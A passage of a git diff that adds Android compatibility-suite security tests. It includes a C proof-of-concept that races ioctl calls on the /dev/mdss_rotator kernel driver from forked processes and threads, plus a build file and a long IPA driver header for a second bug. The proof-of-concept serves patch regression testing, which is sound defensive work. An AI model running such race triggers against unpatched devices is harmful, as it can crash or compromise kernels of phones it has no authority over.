+#define _IOC_TYPECHECK(t) (sizeof(t))
+#define _IOC(dir,type,nr,size) \
+ (((dir) << _IOC_DIRSHIFT) | \
+ ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | \
+ ((size) << _IOC_SIZESHIFT))
+
+
+#define _IO(type,nr) _IOC(_IOC_NONE,(type),(nr),0)
+#define _IOR(type,nr,size) _IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOW(type,nr,size) _IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOWR(type,nr,size) _IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+
+
+
+struct mult_factor {
+ uint32_t numer;
+ uint32_t denom;
+};
+
+struct mdp_rotation_buf_info {
+ uint32_t width;
+ uint32_t height;
+ uint32_t format;
+ struct mult_factor comp_ratio;
+};
+
+struct mdp_rotation_config {
+ uint32_t version;
+ uint32_t session_id;
+ struct mdp_rotation_buf_info input;
+ struct mdp_rotation_buf_info output;
+ uint32_t frame_rate;
+ uint32_t flags;
+ uint32_t reserved[6];
+};
+
+#define MDSS_ROTATOR_IOCTL_MAGIC 'w'
+
+#define MDSS_ROTATION_OPEN \
+ _IOWR(MDSS_ROTATOR_IOCTL_MAGIC, 1, struct mdp_rotation_config *)
+
+#define MDSS_ROTATION_CONFIG \
+ _IOWR(MDSS_ROTATOR_IOCTL_MAGIC, 2, struct mdp_rotation_config *)
+
+#define MDSS_ROTATION_CLOSE _IOW(MDSS_ROTATOR_IOCTL_MAGIC, 4, unsigned int)
+#endif
diff --git a/hostsidetests/security/securityPatch/Bug-34328139/poc.c b/hostsidetests/security/securityPatch/Bug-34328139/poc.c
new file mode 100644
index 0000000..64337fd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34328139/poc.c
@@ -0,0 +1,141 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <unistd.h>
+#include <string.h>
+#include "local_poc.h"
+
+
+int fd;
+struct mdp_rotation_config config;
+int id;
+int status[10];
+int cmd = 0;
+
+void *threadForConfig(void *arg)
+{
+ int index = (int) (unsigned long)arg;
+
+ status[index] = 1;
+
+ while (cmd != 1) {
+ usleep(10);
+ }
+
+ if (cmd == -1)
+ goto failed;
+
+ usleep(5 * index);
+ ioctl(fd, MDSS_ROTATION_CONFIG, &config);
+failed:
+ status[index] = 2;
+ return NULL;
+
+}
+
+void *threadForClose()
+{
+ status[0] = 1;
+
+ while (cmd != 1) {
+ usleep(10);
+ }
+
+ if (cmd == -1)
+ goto failed;
+
+ usleep(50);
+ ioctl(fd, MDSS_ROTATION_CLOSE, id);
+failed:
+ status[0] = 2;
+ return NULL;
+}
+
+int main()
+{
+ int ret, i, count;
+ pthread_t tid[5];
+ int p = 5;
+
+ count = 0;
+retry:
+ if (p-- > 0){
+ fork();
+ }
+
+ cmd = 0;
+ for (i = 0; i < 10; i++)
+ status[i] = 0;
+
+ fd = open("/dev/mdss_rotator", O_RDONLY, 0);
+ if (fd < 0) {
+ return -1;
+ }
+
+ ret = ioctl(fd, MDSS_ROTATION_OPEN, &config);
+ if (ret < 0) {
+ goto failed;
+ } else {
+ id = config.session_id;
+ }
+
+ ret = pthread_create(&tid[0], NULL, threadForClose, NULL);
+ if (ret != 0) {
+ printf("thread failed! errno:%d err:%s\n",errno,strerror(errno));
+ goto failed;
+ }
+
+ for (i = 1; i < 10; i++) {
+ ret = pthread_create(&tid[1], NULL, threadForConfig, (void *)(unsigned long)i);
+ if (ret != 0) {
+ cmd = -1;
+ goto failed;
+ }
+ }
+
+ while (status[0] != 1 || status[1] != 1 || status[2] != 1
+ || status[3] != 1 || status[4] != 1 || status[5] != 1
+ || status[6] != 1 || status[7] != 1 || status[8] != 1
+ || status[9] != 1) {
+ usleep(50);
+ }
+
+ cmd = 1;
+ usleep(10);
+ ioctl(fd, MDSS_ROTATION_CONFIG, &config);
+
+ while (status[0] != 2 || status[1] != 2 || status[2] != 2
+ || status[3] != 2 || status[4] != 2 || status[5] != 2
+ || status[6] != 2 || status[7] != 2 || status[8] != 2
+ || status[9] != 2) {
+ usleep(50);
+ }
+
+
+failed:
+ close(fd);
+ printf("[pid:%d] try %d again!\n", getpid(), ++count);
+ goto retry;
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/Bug-35047217/Android.mk b/hostsidetests/security/securityPatch/Bug-35047217/Android.mk
new file mode 100644
index 0000000..ccf6b5e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047217/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35047217
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-35047217/local_poc.h b/hostsidetests/security/securityPatch/Bug-35047217/local_poc.h
new file mode 100644
index 0000000..889018d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047217/local_poc.h
@@ -0,0 +1,1759 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+*/
+
+#ifndef _UAPI_MSM_IPA_H_
+#define _UAPI_MSM_IPA_H_
+
+#ifndef __KERNEL__
+#include <stdint.h>
+#include <stddef.h>
+#include <sys/stat.h>
+#endif
+#include <linux/ioctl.h>
+#include <linux/types.h>
+#include <linux/if_ether.h>
+
+/**
+ * unique magic number of the IPA device
+ */
+#define IPA_IOC_MAGIC 0xCF
+
+/**
+ * name of the default routing tables for v4 and v6
+ */
+#define IPA_DFLT_RT_TBL_NAME "ipa_dflt_rt"
+
+/**
+ * the commands supported by IPA driver
+ */
+#define IPA_IOCTL_ADD_HDR 0
+#define IPA_IOCTL_DEL_HDR 1
+#define IPA_IOCTL_ADD_RT_RULE 2
+#define IPA_IOCTL_DEL_RT_RULE 3
+#define IPA_IOCTL_ADD_FLT_RULE 4
+#define IPA_IOCTL_DEL_FLT_RULE 5
+#define IPA_IOCTL_COMMIT_HDR 6
+#define IPA_IOCTL_RESET_HDR 7
+#define IPA_IOCTL_COMMIT_RT 8
+#define IPA_IOCTL_RESET_RT 9
+#define IPA_IOCTL_COMMIT_FLT 10
+#define IPA_IOCTL_RESET_FLT 11
+#define IPA_IOCTL_DUMP 12
+#define IPA_IOCTL_GET_RT_TBL 13
+#define IPA_IOCTL_PUT_RT_TBL 14
+#define IPA_IOCTL_COPY_HDR 15
+#define IPA_IOCTL_QUERY_INTF 16
+#define IPA_IOCTL_QUERY_INTF_TX_PROPS 17
+#define IPA_IOCTL_QUERY_INTF_RX_PROPS 18
+#define IPA_IOCTL_GET_HDR 19
+#define IPA_IOCTL_PUT_HDR 20
+#define IPA_IOCTL_SET_FLT 21
+#define IPA_IOCTL_ALLOC_NAT_MEM 22
+#define IPA_IOCTL_V4_INIT_NAT 23
+#define IPA_IOCTL_NAT_DMA 24
+#define IPA_IOCTL_V4_DEL_NAT 26
+#define IPA_IOCTL_PULL_MSG 27
+#define IPA_IOCTL_GET_NAT_OFFSET 28
+#define IPA_IOCTL_RM_ADD_DEPENDENCY 29
+#define IPA_IOCTL_RM_DEL_DEPENDENCY 30
+#define IPA_IOCTL_GENERATE_FLT_EQ 31
+#define IPA_IOCTL_QUERY_INTF_EXT_PROPS 32
+#define IPA_IOCTL_QUERY_EP_MAPPING 33
+#define IPA_IOCTL_QUERY_RT_TBL_INDEX 34
+#define IPA_IOCTL_WRITE_QMAPID 35
+#define IPA_IOCTL_MDFY_FLT_RULE 36
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD 37
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL 38
+#define IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED 39
+#define IPA_IOCTL_ADD_HDR_PROC_CTX 40
+#define IPA_IOCTL_DEL_HDR_PROC_CTX 41
+#define IPA_IOCTL_MDFY_RT_RULE 42
+#define IPA_IOCTL_ADD_RT_RULE_AFTER 43
+#define IPA_IOCTL_ADD_FLT_RULE_AFTER 44
+#define IPA_IOCTL_GET_HW_VERSION 45
+#define IPA_IOCTL_MAX 46
+
+/**
+ * max size of the header to be inserted
+ */
+#define IPA_HDR_MAX_SIZE 64
+
+/**
+ * max size of the name of the resource (routing table, header)
+ */
+#define IPA_RESOURCE_NAME_MAX 32
+
+/**
+ * max number of interface properties
+ */
+#define IPA_NUM_PROPS_MAX 35
+
+/**
+ * size of the mac address
+ */
+#define IPA_MAC_ADDR_SIZE 6
+
+/**
+ * max number of mbim streams
+ */
+#define IPA_MBIM_MAX_STREAM_NUM 8
+
+/**
+ * the attributes of the rule (routing or filtering)
+ */
+#define IPA_FLT_TOS (1ul << 0)
+#define IPA_FLT_PROTOCOL (1ul << 1)
+#define IPA_FLT_SRC_ADDR (1ul << 2)
+#define IPA_FLT_DST_ADDR (1ul << 3)
+#define IPA_FLT_SRC_PORT_RANGE (1ul << 4)
+#define IPA_FLT_DST_PORT_RANGE (1ul << 5)
+#define IPA_FLT_TYPE (1ul << 6)
+#define IPA_FLT_CODE (1ul << 7)
+#define IPA_FLT_SPI (1ul << 8)
+#define IPA_FLT_SRC_PORT (1ul << 9)
+#define IPA_FLT_DST_PORT (1ul << 10)
+#define IPA_FLT_TC (1ul << 11)
+#define IPA_FLT_FLOW_LABEL (1ul << 12)
+#define IPA_FLT_NEXT_HDR (1ul << 13)
+#define IPA_FLT_META_DATA (1ul << 14)
+#define IPA_FLT_FRAGMENT (1ul << 15)
+#define IPA_FLT_TOS_MASKED (1ul << 16)
+#define IPA_FLT_MAC_SRC_ADDR_ETHER_II (1ul << 17)
+#define IPA_FLT_MAC_DST_ADDR_ETHER_II (1ul << 18)
+#define IPA_FLT_MAC_SRC_ADDR_802_3 (1ul << 19)
+#define IPA_FLT_MAC_DST_ADDR_802_3 (1ul << 20)
+#define IPA_FLT_MAC_ETHER_TYPE (1ul << 21)
+
+/**
+ * enum ipa_client_type - names for the various IPA "clients"
+ * these are from the perspective of the clients, for e.g.
+ * HSIC1_PROD means HSIC client is the producer and IPA is the
+ * consumer
+ */
+enum ipa_client_type {
+ IPA_CLIENT_PROD,
+ IPA_CLIENT_HSIC1_PROD = IPA_CLIENT_PROD,
+ IPA_CLIENT_WLAN1_PROD,
+ IPA_CLIENT_HSIC2_PROD,
+ IPA_CLIENT_USB2_PROD,
+ IPA_CLIENT_HSIC3_PROD,
+ IPA_CLIENT_USB3_PROD,
+ IPA_CLIENT_HSIC4_PROD,
+ IPA_CLIENT_USB4_PROD,
+ IPA_CLIENT_HSIC5_PROD,
+ IPA_CLIENT_USB_PROD,
+ IPA_CLIENT_A5_WLAN_AMPDU_PROD,
+ IPA_CLIENT_A2_EMBEDDED_PROD,
+ IPA_CLIENT_A2_TETHERED_PROD,
+ IPA_CLIENT_APPS_LAN_WAN_PROD,
+ IPA_CLIENT_APPS_CMD_PROD,
+ IPA_CLIENT_ODU_PROD,
+ IPA_CLIENT_MHI_PROD,
+ IPA_CLIENT_Q6_LAN_PROD,
+ IPA_CLIENT_Q6_WAN_PROD,
+ IPA_CLIENT_Q6_CMD_PROD,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_PROD,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD,
+ IPA_CLIENT_Q6_DECOMP_PROD,
+ IPA_CLIENT_Q6_DECOMP2_PROD,
+ IPA_CLIENT_UC_USB_PROD,
+
+ /* Below PROD client type is only for test purpose */
+ IPA_CLIENT_TEST_PROD,
+ IPA_CLIENT_TEST1_PROD,
+ IPA_CLIENT_TEST2_PROD,
+ IPA_CLIENT_TEST3_PROD,
+ IPA_CLIENT_TEST4_PROD,
+
+ IPA_CLIENT_CONS,
+ IPA_CLIENT_HSIC1_CONS = IPA_CLIENT_CONS,
+ IPA_CLIENT_WLAN1_CONS,
+ IPA_CLIENT_HSIC2_CONS,
+ IPA_CLIENT_USB2_CONS,
+ IPA_CLIENT_WLAN2_CONS,
+ IPA_CLIENT_HSIC3_CONS,
+ IPA_CLIENT_USB3_CONS,
+ IPA_CLIENT_WLAN3_CONS,
+ IPA_CLIENT_HSIC4_CONS,
+ IPA_CLIENT_USB4_CONS,
+ IPA_CLIENT_WLAN4_CONS,
+ IPA_CLIENT_HSIC5_CONS,
+ IPA_CLIENT_USB_CONS,
+ IPA_CLIENT_USB_DPL_CONS,
+ IPA_CLIENT_A2_EMBEDDED_CONS,
+ IPA_CLIENT_A2_TETHERED_CONS,
+ IPA_CLIENT_A5_LAN_WAN_CONS,
+ IPA_CLIENT_APPS_LAN_CONS,
+ IPA_CLIENT_APPS_WAN_CONS,
+ IPA_CLIENT_ODU_EMB_CONS,
+ IPA_CLIENT_ODU_TETH_CONS,
+ IPA_CLIENT_MHI_CONS,
+ IPA_CLIENT_Q6_LAN_CONS,
+ IPA_CLIENT_Q6_WAN_CONS,
+ IPA_CLIENT_Q6_DUN_CONS,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_CONS,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS,
+ IPA_CLIENT_Q6_DECOMP_CONS,
+ IPA_CLIENT_Q6_DECOMP2_CONS,
+ IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS,
+ /* Below CONS client type is only for test purpose */
+ IPA_CLIENT_TEST_CONS,
+ IPA_CLIENT_TEST1_CONS,
+ IPA_CLIENT_TEST2_CONS,
+ IPA_CLIENT_TEST3_CONS,
+ IPA_CLIENT_TEST4_CONS,
+
+ IPA_CLIENT_MAX,
+};
+
+#define IPA_CLIENT_IS_APPS_CONS(client) \
+ ((client) == IPA_CLIENT_APPS_LAN_CONS || \
+ (client) == IPA_CLIENT_APPS_WAN_CONS)
+
+#define IPA_CLIENT_IS_USB_CONS(client) \
+ ((client) == IPA_CLIENT_USB_CONS || \
+ (client) == IPA_CLIENT_USB2_CONS || \
+ (client) == IPA_CLIENT_USB3_CONS || \
+ (client) == IPA_CLIENT_USB_DPL_CONS || \
+ (client) == IPA_CLIENT_USB4_CONS)
+
+#define IPA_CLIENT_IS_WLAN_CONS(client) \
+ ((client) == IPA_CLIENT_WLAN1_CONS || \
+ (client) == IPA_CLIENT_WLAN2_CONS || \
+ (client) == IPA_CLIENT_WLAN3_CONS || \
+ (client) == IPA_CLIENT_WLAN4_CONS)
+
+#define IPA_CLIENT_IS_ODU_CONS(client) \
+ ((client) == IPA_CLIENT_ODU_EMB_CONS || \
+ (client) == IPA_CLIENT_ODU_TETH_CONS)
+
+#define IPA_CLIENT_IS_Q6_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD)
+
+#define IPA_CLIENT_IS_Q6_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_CONS(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_CONS || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_PROD(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_PROD || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD)
+
+#define IPA_CLIENT_IS_MHI_CONS(client) \
+ ((client) == IPA_CLIENT_MHI_CONS)
+
+#define IPA_CLIENT_IS_MHI(client) \
+ ((client) == IPA_CLIENT_MHI_CONS || \
+ (client) == IPA_CLIENT_MHI_PROD)
+
+#define IPA_CLIENT_IS_TEST_PROD(client) \
+ ((client) == IPA_CLIENT_TEST_PROD || \
+ (client) == IPA_CLIENT_TEST1_PROD || \
+ (client) == IPA_CLIENT_TEST2_PROD || \
+ (client) == IPA_CLIENT_TEST3_PROD || \
+ (client) == IPA_CLIENT_TEST4_PROD)
+
+#define IPA_CLIENT_IS_TEST_CONS(client) \
+ ((client) == IPA_CLIENT_TEST_CONS || \
+ (client) == IPA_CLIENT_TEST1_CONS || \
+ (client) == IPA_CLIENT_TEST2_CONS || \
+ (client) == IPA_CLIENT_TEST3_CONS || \
+ (client) == IPA_CLIENT_TEST4_CONS)
+
+#define IPA_CLIENT_IS_TEST(client) \
+ (IPA_CLIENT_IS_TEST_PROD(client) || IPA_CLIENT_IS_TEST_CONS(client))
+
+/**
+ * enum ipa_ip_type - Address family: IPv4 or IPv6
+ */
+enum ipa_ip_type {
+ IPA_IP_v4,
+ IPA_IP_v6,
+ IPA_IP_MAX
+};
+
+/**
+ * enum ipa_rule_type - Type of routing or filtering rule
+ * Hashable: Rule will be located at the hashable tables
+ * Non_Hashable: Rule will be located at the non-hashable tables
+ */
+enum ipa_rule_type {
+ IPA_RULE_HASHABLE,
+ IPA_RULE_NON_HASHABLE,
+ IPA_RULE_TYPE_MAX
+};
+
+/**
+ * enum ipa_flt_action - action field of filtering rule
+ *
+ * Pass to routing: 5'd0
+ * Pass to source NAT: 5'd1
+ * Pass to destination NAT: 5'd2
+ * Pass to default output pipe (e.g., Apps or Modem): 5'd3
+ */
+enum ipa_flt_action {
+ IPA_PASS_TO_ROUTING,
+ IPA_PASS_TO_SRC_NAT,
+ IPA_PASS_TO_DST_NAT,
+ IPA_PASS_TO_EXCEPTION
+};
+
+/**
+ * enum ipa_wlan_event - Events for wlan client
+ *
+ * wlan client connect: New wlan client connected
+ * wlan client disconnect: wlan client disconnected
+ * wlan client power save: wlan client moved to power save
+ * wlan client normal: wlan client moved out of power save
+ * sw routing enable: ipa routing is disabled
+ * sw routing disable: ipa routing is enabled
+ * wlan ap connect: wlan AP(access point) is up
+ * wlan ap disconnect: wlan AP(access point) is down
+ * wlan sta connect: wlan STA(station) is up
+ * wlan sta disconnect: wlan STA(station) is down
+ * wlan client connect ex: new wlan client connected
+ * wlan scc switch: wlan interfaces in scc mode
+ * wlan mcc switch: wlan interfaces in mcc mode
+ * wlan wdi enable: wdi data path completed
+ * wlan wdi disable: wdi data path teardown
+ */
+enum ipa_wlan_event {
+ WLAN_CLIENT_CONNECT,
+ WLAN_CLIENT_DISCONNECT,
+ WLAN_CLIENT_POWER_SAVE_MODE,
+ WLAN_CLIENT_NORMAL_MODE,
+ SW_ROUTING_ENABLE,
+ SW_ROUTING_DISABLE,
+ WLAN_AP_CONNECT,
+ WLAN_AP_DISCONNECT,
+ WLAN_STA_CONNECT,
+ WLAN_STA_DISCONNECT,
+ WLAN_CLIENT_CONNECT_EX,
+ WLAN_SWITCH_TO_SCC,
+ WLAN_SWITCH_TO_MCC,
+ WLAN_WDI_ENABLE,
+ WLAN_WDI_DISABLE,
+ IPA_WLAN_EVENT_MAX
+};
+
+/**
+ * enum ipa_wan_event - Events for wan client
+ *
+ * wan default route add/del
+ * wan embms connect: New wan embms interface connected
+ */
+enum ipa_wan_event {
+ WAN_UPSTREAM_ROUTE_ADD = IPA_WLAN_EVENT_MAX,
+ WAN_UPSTREAM_ROUTE_DEL,
+ WAN_EMBMS_CONNECT,
+ WAN_XLAT_CONNECT,
+ IPA_WAN_EVENT_MAX
+};
+
+enum ipa_ecm_event {
+ ECM_CONNECT = IPA_WAN_EVENT_MAX,
+ ECM_DISCONNECT,
+ IPA_ECM_EVENT_MAX,
+};
+
+enum ipa_tethering_stats_event {
+ IPA_TETHERING_STATS_UPDATE_STATS = IPA_ECM_EVENT_MAX,
+ IPA_TETHERING_STATS_UPDATE_NETWORK_STATS,
+ IPA_TETHERING_STATS_EVENT_MAX,
+ IPA_EVENT_MAX_NUM = IPA_TETHERING_STATS_EVENT_MAX
+};
+
+#define IPA_EVENT_MAX ((int)IPA_EVENT_MAX_NUM)
+
+/**
+ * enum ipa_rm_resource_name - IPA RM clients identification names
+ *
+ * Add new mapping to ipa_rm_prod_index() / ipa_rm_cons_index()
+ * when adding new entry to this enum.
+ */
+enum ipa_rm_resource_name {
+ IPA_RM_RESOURCE_PROD = 0,
+ IPA_RM_RESOURCE_Q6_PROD = IPA_RM_RESOURCE_PROD,
+ IPA_RM_RESOURCE_USB_PROD,
+ IPA_RM_RESOURCE_USB_DPL_DUMMY_PROD,
+ IPA_RM_RESOURCE_HSIC_PROD,
+ IPA_RM_RESOURCE_STD_ECM_PROD,
+ IPA_RM_RESOURCE_RNDIS_PROD,
+ IPA_RM_RESOURCE_WWAN_0_PROD,
+ IPA_RM_RESOURCE_WLAN_PROD,
+ IPA_RM_RESOURCE_ODU_ADAPT_PROD,
+ IPA_RM_RESOURCE_MHI_PROD,
+ IPA_RM_RESOURCE_PROD_MAX,
+
+ IPA_RM_RESOURCE_Q6_CONS = IPA_RM_RESOURCE_PROD_MAX,
+ IPA_RM_RESOURCE_USB_CONS,
+ IPA_RM_RESOURCE_USB_DPL_CONS,
+ IPA_RM_RESOURCE_HSIC_CONS,
+ IPA_RM_RESOURCE_WLAN_CONS,
+ IPA_RM_RESOURCE_APPS_CONS,
+ IPA_RM_RESOURCE_ODU_ADAPT_CONS,
+ IPA_RM_RESOURCE_MHI_CONS,
+ IPA_RM_RESOURCE_MAX
+};
+
+/**
+ * enum ipa_hw_type - IPA hardware version type
+ * @IPA_HW_None: IPA hardware version not defined
+ * @IPA_HW_v1_0: IPA hardware version 1.0
+ * @IPA_HW_v1_1: IPA hardware version 1.1
+ * @IPA_HW_v2_0: IPA hardware version 2.0
+ * @IPA_HW_v2_1: IPA hardware version 2.1
+ * @IPA_HW_v2_5: IPA hardware version 2.5
+ * @IPA_HW_v2_6: IPA hardware version 2.6
+ * @IPA_HW_v2_6L: IPA hardware version 2.6L
+ * @IPA_HW_v3_0: IPA hardware version 3.0
+ */
+enum ipa_hw_type {
+ IPA_HW_None = 0,
+ IPA_HW_v1_0 = 1,
+ IPA_HW_v1_1 = 2,
+ IPA_HW_v2_0 = 3,
+ IPA_HW_v2_1 = 4,
+ IPA_HW_v2_5 = 5,
+ IPA_HW_v2_6 = IPA_HW_v2_5,
+ IPA_HW_v2_6L = 6,
+ IPA_HW_v3_0 = 10,
+ IPA_HW_v3_1 = 11,
+ IPA_HW_MAX
+};
+
+/**
+ * struct ipa_rule_attrib - attributes of a routing/filtering
+ * rule, all in LE
+ * @attrib_mask: what attributes are valid
+ * @src_port_lo: low port of src port range
+ * @src_port_hi: high port of src port range
+ * @dst_port_lo: low port of dst port range
+ * @dst_port_hi: high port of dst port range
+ * @type: ICMP/IGMP type
+ * @code: ICMP/IGMP code
+ * @spi: IPSec SPI
+ * @src_port: exact src port
+ * @dst_port: exact dst port
+ * @meta_data: meta-data val
+ * @meta_data_mask: meta-data mask
+ * @u.v4.tos: type of service
+ * @u.v4.protocol: protocol
+ * @u.v4.src_addr: src address value
+ * @u.v4.src_addr_mask: src address mask
+ * @u.v4.dst_addr: dst address value
+ * @u.v4.dst_addr_mask: dst address mask
+ * @u.v6.tc: traffic class
+ * @u.v6.flow_label: flow label
+ * @u.v6.next_hdr: next header
+ * @u.v6.src_addr: src address val
+ * @u.v6.src_addr_mask: src address mask
+ * @u.v6.dst_addr: dst address val
+ * @u.v6.dst_addr_mask: dst address mask
+ */
+struct ipa_rule_attrib {
+ uint32_t attrib_mask;
+ uint16_t src_port_lo;
+ uint16_t src_port_hi;
+ uint16_t dst_port_lo;
+ uint16_t dst_port_hi;
+ uint8_t type;
+ uint8_t code;
+ uint8_t tos_value;
+ uint8_t tos_mask;
+ uint32_t spi;
+ uint16_t src_port;
+ uint16_t dst_port;
+ uint32_t meta_data;
+ uint32_t meta_data_mask;
+ uint8_t src_mac_addr[ETH_ALEN];
+ uint8_t src_mac_addr_mask[ETH_ALEN];
+ uint8_t dst_mac_addr[ETH_ALEN];
+ uint8_t dst_mac_addr_mask[ETH_ALEN];
+ uint16_t ether_type;
+ union {
+ struct {
+ uint8_t tos;
+ uint8_t protocol;
+ uint32_t src_addr;
+ uint32_t src_addr_mask;
+ uint32_t dst_addr;
+ uint32_t dst_addr_mask;
+ } v4;
+ struct {
+ uint8_t tc;
+ uint32_t flow_label;
+ uint8_t next_hdr;
+ uint32_t src_addr[4];
+ uint32_t src_addr_mask[4];
+ uint32_t dst_addr[4];
+ uint32_t dst_addr_mask[4];
+ } v6;
+ } u;
+};
+
+/*! @brief The maximum number of Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of IHL offset Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of Mask Equal 128 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_128_EQNS 2
+
+/*! @brief The maximum number of IHL offset Range Check 16 Eqns */
+#define IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS 2
+
+/*! @brief Offset and 16 bit comparison equation */
+struct ipa_ipfltr_eq_16 {
+ int8_t offset;
+ uint16_t value;
+};
+
+/*! @brief Offset and 32 bit comparison equation */
+struct ipa_ipfltr_eq_32 {
+ int8_t offset;
+ uint32_t value;
+};
+
+/*! @brief Offset and 128 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_128 {
+ int8_t offset;
+ uint8_t mask[16];
+ uint8_t value[16];
+};
+
+/*! @brief Offset and 32 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_32 {
+ int8_t offset;
+ uint32_t mask;
+ uint32_t value;
+};
+
+/*! @brief Equation for identifying a range. Ranges are inclusive */
+struct ipa_ipfltr_range_eq_16 {
+ int8_t offset;
+ uint16_t range_low;
+ uint16_t range_high;
+};
+
+/*! @brief Rule equations which are set according to DS filter installation */
+struct ipa_ipfltri_rule_eq {
+ /*! 16-bit Bitmask to indicate how many eqs are valid in this rule */
+ uint16_t rule_eq_bitmap;
+ /*! Specifies if a type of service check rule is present */
+ uint8_t tos_eq_present;
+ /*! The value to check against the type of service (ipv4) field */
+ uint8_t tos_eq;
